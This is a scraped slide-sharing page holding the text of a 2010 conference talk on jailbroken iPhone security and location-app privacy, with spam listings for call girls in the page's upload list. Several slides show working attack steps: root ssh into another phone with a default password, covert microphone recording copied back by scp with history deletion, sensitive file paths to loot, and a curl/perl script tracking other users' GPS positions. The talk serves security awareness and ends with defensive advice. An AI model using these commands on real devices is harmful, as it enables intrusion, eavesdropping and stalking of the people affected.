Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Scott Keck-Warren
 
Pigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreternaman860154
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):comworks
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationSafe Software
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationMichael W. Hawkins
 

Recently uploaded (20)

08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path Mount
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
 
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
 
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
Key Features Of Token Development (1).pptx
Key Features Of Token Development (1).pptxKey Features Of Token Development (1).pptx
Key Features Of Token Development (1).pptx
 
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
 
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024
 
How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024
 
Pigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food Manufacturing
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
 
Vulnerability_Management_GRC_by Sohang Sengupta.pptx
Vulnerability_Management_GRC_by Sohang Sengupta.pptxVulnerability_Management_GRC_by Sohang Sengupta.pptx
Vulnerability_Management_GRC_by Sohang Sengupta.pptx
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
 

The New World of Smartphone Security

  • 1. The New World of Smartphone Security What Your iPhone Disclosed About You Trevor Hawthorn Managing Partner Friday, July 9, 2010
  • 2. Today’s Talk “Pockets full of shells” Friday, July 9, 2010
  • 3. Today’s Talk “I can see you from my house” Friday, July 9, 2010
  • 4. Who I am now Friday, July 9, 2010
  • 5. Old Smartphone Best Practices = Bad = Good Friday, July 9, 2010
  • 6. New Smartphone Best Practices 1. IT will use the iPhone Configuration Utility so you can talk to Exchange, use the VPN, wireless, etc. 2. Get iFart, it’s hilarious. Friday, July 9, 2010
  • 7. If AT&T is in attendance: Friday, July 9, 2010
  • 8. If AT&T is in attendance: • Facts about AT&T and me: Friday, July 9, 2010
  • 9. If AT&T is in attendance: • Facts about AT&T and me: • I enjoy my AT&T wireless service Friday, July 9, 2010
  • 10. If AT&T is in attendance: • Facts about AT&T and me: • I enjoy my AT&T wireless service • Feel that I have fantastic coverage everywhere I go at all times Friday, July 9, 2010
  • 11. If AT&T is in attendance: • Facts about AT&T and me: • I enjoy my AT&T wireless service • Feel that I have fantastic coverage everywhere I go at all times • Am sure you have the largest/fastest 3G network, regardless of what VZW says Friday, July 9, 2010
  • 12. If AT&T is in attendance: • Facts about AT&T and me: • I enjoy my AT&T wireless service • Feel that I have fantastic coverage everywhere I go at all times • Am sure you have the largest/fastest 3G network, regardless of what VZW says • Looking forward to years of receiving quality service from you Friday, July 9, 2010
  • 13. If AT&T is in attendance: • Facts about AT&T and me: • I enjoy my AT&T wireless service • Feel that I have fantastic coverage everywhere I go at all times • Am sure you have the largest/fastest 3G network, regardless of what VZW says • Looking forward to years of receiving quality service from you • Would love to chat Friday, July 9, 2010
  • 14. Jailbreaking blackra1n pwnagetool Friday, July 9, 2010
  • 15. It opens up a whole new world of applications Friday, July 9, 2010
  • 16. It opens up a whole new world of applications • common Unix binaries Friday, July 9, 2010
  • 17. It opens up a whole new world of applications • common Unix binaries • sshd Friday, July 9, 2010
  • 18. It opens up a whole new world of applications • common Unix binaries • sshd • tethering Friday, July 9, 2010
  • 19. It opens up a whole new world of applications • common Unix binaries • sshd • tethering • pirate software Friday, July 9, 2010
  • 20. It opens up a whole new world of applications • common Unix binaries • sshd • tethering • pirate software • super easy to JB your phone Friday, July 9, 2010
  • 21. Impact on security “Jail breaking removes 80% of the iPhone’s security precautions” Charlie Miller, SyScan 2009 Friday, July 9, 2010
  • 22. How many iPhones are jailbroken? Friday, July 9, 2010
  • 23. 6.93% [1]http://www.slideshare.net/pinchmedia/piracy-on-the-appstore Friday, July 9, 2010
  • 25. ifconfig root# ifconfig lo0: flags=8049<UP,LOOPBACK,RUNNING,MULTICAST> mtu 16384 inet 127.0.0.1 netmask 0xff000000 en0: flags=8963<UP,BROADCAST,SMART,RUNNING,PROMISC,SIMPLEX,MULTICAST> mtu 1500 ether 00:21:e9:09:e3:4f pdp_ip0: flags=8011<UP,POINTOPOINT,MULTICAST> mtu 1450 inet 10.69.62.220 --> 10.69.62.220 netmask 0xffffffff pdp_ip1: flags=8011<UP,POINTOPOINT,MULTICAST> mtu 1450 pdp_ip2: flags=8011<UP,POINTOPOINT,MULTICAST> mtu 1024 pdp_ip3: flags=8011<UP,POINTOPOINT,MULTICAST> mtu 1024 en1: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500 inet 192.168.20.1 netmask 0xffffff00 broadcast 192.168.20.255 ether 0a:0b:ad:0b:ab:e0 Friday, July 9, 2010
  • 27. Interfaces en0 = 802.11 interface Friday, July 9, 2010
  • 28. Interfaces en0 = 802.11 interface pdp_ip0 = primary cellular interface on APN: wap.cingular Friday, July 9, 2010
  • 29. Interfaces en0 = 802.11 interface pdp_ip0 = primary cellular interface on APN: wap.cingular pdp_ip1 = activates when retrieving visual voicemail on APN: acds.voicemail Friday, July 9, 2010
  • 30. Interfaces en0 = 802.11 interface pdp_ip0 = primary cellular interface on APN: wap.cingular pdp_ip1 = activates when retrieving visual voicemail on APN: acds.voicemail pdp_ip2 = not sure Friday, July 9, 2010
  • 31. Interfaces en0 = 802.11 interface pdp_ip0 = primary cellular interface on APN: wap.cingular pdp_ip1 = activates when retrieving visual voicemail on APN: acds.voicemail pdp_ip2 = not sure pdp_ip3 = used with tethering Friday, July 9, 2010
  • 32. ifconfig pdp_ip0: flags=8011<UP,POINTOPOINT,MULTICAST> mtu 1450 inet 10.69.62.220 --> 10.69.62.220 netmask 0xffffffff Friday, July 9, 2010
  • 35. Until (about) October 16, 2009 AT&T did not filter device to device IP network traffic. Friday, July 9, 2010
  • 36. AT&T’s Network Most people think it looks like this: /32 Friday, July 9, 2010
  • 37. AT&T’s Network Actually, more like this: Multiple /16’s Friday, July 9, 2010
  • 38. Your smartphone (and laptop/ blackberry, etc.) has been on one giant flat network... Friday, July 9, 2010
  • 39. So I started looking around... Friday, July 9, 2010
  • 42. Devices On the Network 10,589* IPs scanned Count Port What? 83 22 sshd 24 80 http 4 2008 PDANet 3,644 62078 iPhone Default Friday, July 9, 2010
  • 43. Other stuff out there • Saw a Linux box with sshd • Windows Mobile devices • Blackberries • Windows PC’s • PDANet for the iPhone is an open proxy. Friday, July 9, 2010
  • 45. ssh access between phones Trevors-iPhone:~ root# ssh root@10.69.62.100 Password: [alpine] Nates-iPhone:~ root# Nates-iPhone:~ root# id uid=0(root) gid=0(wheel) groups=0(wheel),1 (daemon),2(kmem),3(sys),4(tty),5(operator),8 (procview),9(procmod),20(staff),29 (certusers),80(admin) Friday, July 9, 2010
  • 46. Filesystem Guide Interesting stuff: /private/var/mobile/Library/Mail - Email (IMAP Exchange, POP3, etc.) , /private/var/mobile/Library/SMS - SMS Text Messages /private/var/mobile/Library/Voicemail - Voicemail in .amr format /private/var/mobile/Library/AddressBook - Contacts /private/var/mobile/Library/CallHistory - Call History /private/var/mobile/Library/Notes - Notes Friday, July 9, 2010
  • 47. /private/var/mobile/Library/CallHistory/call_history.db /private/var/mobile/Library/AddressBook/AddressBook.sqlitedb /private/var/mobile/Library/AddressBook/AddressbookImages.sqlitedb /private/var/mobile/Library/Cookies/Cookies.plist /private/var/mobile/Library/Keyboard/dynamic-text.dat /private/var/mobile/Library/Mail/Accounts.plist /private/var/mobile/Library/Mail/(mail account name)/Deleted Messages /private/var/mobile/Library/Mail/(mail account name)/Sent Messages /private/var/mobile/Library/Mail/(mail account name)/INBOX /private/var/mobile/Library/Maps/History.plist /private/var/mobile/Library/YouTube/Bookmarks.plist /private/var/mobile/Library/Voicemail/(amr files) /private/var/mobile/Library/Voicemail/voicemail.db /private/var/mobile/Library/Safari/Bookmarks.plist /private/var/mobile/Library/Safari/History.plist /private/var/mobile/Library/Suspend.plist /private/var/mobile/Library/Safari/SuspendState.plist /private/var/mobile/Library/Safari/SMS/sms.db /private/var/mobile/Library/Preference/(various preference Plists) /private/var/mobile/Library/Notes/notes.db Friday, July 9, 2010
  • 48. Let’s do a bit more Erica Utilities - cmd line utilities for the iPhone recAudio: Record audio from the recAudio onboard microphone. Queries the iPhone’s GPS API to findme return latitude/longitude Friday, July 9, 2010
  • 49. Attacker Victim recAudio scp/ssh recording.aiff 10.69.62.220 10.69.62.100 Friday, July 9, 2010
  • 50. I can hear you typing Trevors-iPhone:~ root# scp bin/recAudio root@10.69.62.100: Password: recAudio 100% 19KB 1.3KB/s 00:00 Trevors-iPhone:~ root# ssh root@10.69.62.100 Password: Nates-iPhone:~ root# ./recAudio Start talking. Press ^C to finish. Starting recording ^C Interrupted. Stopping recording Friday, July 9, 2010
  • 51. Nates-iPhone:~ root# ls -l *.aiff -rw-r--r-- 1 root wheel 43178 Oct 2 22:35 2009-10-92 at 22:35:04.aiff Nates-iPhone:~ root# mv 2009-10-92 at 22:35:04.aiff test.aiff Trevors-iPhone: root# scp root@10.69.62.100:~/*.aiff . Password: test.aiff 100% 523KB 2.2KB/ s 00:00 Nates-iPhone:~ root# rm test.aiff recAudio .bash_history Nates-iPhone:~ root# last wtmp begins at Fri Oct 2 22:41 Nates-iPhone:~ root# Friday, July 9, 2010
  • 52. Other bad things Friday, July 9, 2010
  • 53. Other bad things • ./openURL tel://1-900-XXX-XXX Friday, July 9, 2010
  • 54. Other bad things • ./openURL tel://1-900-XXX-XXX • ./openURL tel://911 or tel://mynumber Friday, July 9, 2010
  • 55. Other bad things • ./openURL tel://1-900-XXX-XXX • ./openURL tel://911 or tel://mynumber • Pillage filesystem: email, sms, notes, app data, etc. Friday, July 9, 2010
  • 56. Other bad things • ./openURL tel://1-900-XXX-XXX • ./openURL tel://911 or tel://mynumber • Pillage filesystem: email, sms, notes, app data, etc. • apt-get install tcpdump nmap Friday, July 9, 2010
  • 57. Other bad things • ./openURL tel://1-900-XXX-XXX • ./openURL tel://911 or tel://mynumber • Pillage filesystem: email, sms, notes, app data, etc. • apt-get install tcpdump nmap • go wild on whatever network en0 is connected to. Friday, July 9, 2010
  • 59. Dutch Extortion November 2009 Friday, July 9, 2010
  • 60. ikee Worm November 2009 Friday, July 9, 2010
  • 61. Exploits • Phone/Privacy.A* command line tool • Phone/iBotNet.A* worm with C&C *Discovered by security firm Intego Friday, July 9, 2010
  • 62. Some good news Friday, July 9, 2010
  • 63. Some good news • AT&T does segment part of their network: Friday, July 9, 2010
  • 64. Some good news • AT&T does segment part of their network: • e.g. I could not see friend in CA from DC Friday, July 9, 2010
  • 65. Some good news • AT&T does segment part of their network: • e.g. I could not see friend in CA from DC • But I could see friend in Boston Friday, July 9, 2010
  • 66. Some good news • AT&T does segment part of their network: • e.g. I could not see friend in CA from DC • But I could see friend in Boston • No easy way to target specific individual (Identity to AT&T NAT IP address not super easy) Friday, July 9, 2010
  • 67. Some good news • AT&T does segment part of their network: • e.g. I could not see friend in CA from DC • But I could see friend in Boston • No easy way to target specific individual (Identity to AT&T NAT IP address not super easy) • No way to correlate 10.x.x.x IP to person via Safari Friday, July 9, 2010
  • 68. Some good news • AT&T does segment part of their network: • e.g. I could not see friend in CA from DC • But I could see friend in Boston • No easy way to target specific individual (Identity to AT&T NAT IP address not super easy) • No way to correlate 10.x.x.x IP to person via Safari • decloak.net doesn’t really work in Mobile Safari Friday, July 9, 2010
  • 69. Some good news • AT&T does segment part of their network: • e.g. I could not see friend in CA from DC • But I could see friend in Boston • No easy way to target specific individual (Identity to AT&T NAT IP address not super easy) • No way to correlate 10.x.x.x IP to person via Safari • decloak.net doesn’t really work in Mobile Safari • Man this is slow... Friday, July 9, 2010
  • 70. email to ID user <img src=”http://10.69.62.220/i.jpg”> 10.69.63.220:80 10.69.63.110 src:10.69.63.110 10.69.63.220:80 10.69.63.110 dst:10.69.63.220 Friday, July 9, 2010
  • 71. What to do • Don’t Jailbreak your phone if you care about security (sorry) • Change root and mobile users’ passwords • Attention Cydia Folks: Do not bind sshd to pdp interfaces; force password change upon install • IT Folks: Policy on jailbroken iphones • AT&T: Filter mobile to mobile IP traffic Friday, July 9, 2010
  • 72. Privacy and Location Based Apps Friday, July 9, 2010
  • 74. Location Based Apps • Underworld: Sweet Deal Friday, July 9, 2010
  • 75. Location Based Apps • Underworld: Sweet Deal • Drug trafficking game with candy Friday, July 9, 2010
  • 76. Location Based Apps • Underworld: Sweet Deal • Drug trafficking game with candy • Location matters, move product from point A to point B Friday, July 9, 2010
  • 77. Location Based Apps • Underworld: Sweet Deal • Drug trafficking game with candy • Location matters, move product from point A to point B • Phone sends high resolution coordinates to game server Friday, July 9, 2010
  • 81. Paros • Client side proxy • Configure iPhone to use machine running Paros’s IP address as proxy • Watch what your apps send and receive Friday, July 9, 2010
  • 84. Used to monitor players Friday, July 9, 2010
  • 90. Let’s pick a non-intel agency player chezk Friday, July 9, 2010
  • 96. Ok neat, what else? Friday, July 9, 2010
  • 97. Near real-time geolocation tracking of players Friday, July 9, 2010
  • 98. cURL + perl + crontab = csv + gpsbabel = kml + Google Earth = EPIC screen shots Friday, July 9, 2010
  • 99. curl script #/bin/sh # # First login... # curl -s -H "User-Agent: Underworld premium/1.4.0 CFNetwork/459 Darwin/ 10.0.0d3" -d @/home/trevor/iphone/login.xml --dump-header /home/ trevor/iphone/headers.txt http://game.dl.a-steroids.com/TrafficServer/ # # Then update location curl -s -H "User-Agent: Underworld premium/1.4.0 CFNetwork/459 Darwin/ 10.0.0d3" -b /home/trevor/iphone/headers.txt -d @/home/trevor/iphone/ update_loc.xml http://game.dl.a-steroids.com/TrafficServer/ # # Get GMap obhjects curl -s -H "User-Agent: Underworld premium/1.4.0 CFNetwork/459 Darwin/ 10.0.0d3" -b /home/trevor/iphone/headers.txt -d @/home/trevor/iphone/ gmap_update.xml http://game.dl.a-steroids.com/TrafficServer/ Friday, July 9, 2010
  • 100. perl script #! /usr/bin/perl use strict; use warnings; # make single or multiline input into one scalar my $glob = join('',(<>)); # extract name-to-flag records my @records = $glob =~ /(<name>.*?</lon>)/ig; for (@records) { my ($name,$lat,$lon) = $_ =~ qr|<name>(.*?)</name>.*?<lat>([-d.]*)</lat><lon>([-d .]*)</lon>|i; print "$lat,$lon,$namen"; } Friday, July 9, 2010
  • 101. perl script output 39.93220206723633,-77.47186584472656,poppyseed 38.13753356933594,-77.06847380591797,Gadsden 39.98429718017578,-78.30014190673828,Ziggety 39.23520812988281,-77.40483581542969,Lexi 39.855418395996094,-77.2717056274414,Tatu 39.55705801582031,-77.4004086303711,Bigfoot 36.67790985107422,-77.5902328491211,Jeneko 38.297552490234375,-77.65829467773438,Stilbored 39.891050720214844,-77.55879211025781,Timoteo 39.66313247680664,-78.04374694824219,Gamber 36.295310314697266,-78.14061126700984,UnderWear Friday, July 9, 2010
  • 110. Comments/Feedback: trevor.hawthorn@stratumsecurity.com www.stratumsecurity.com Twitter: @packetwerks @stratumsecurity Special Thanks: Tiago Stock Friday, July 9, 2010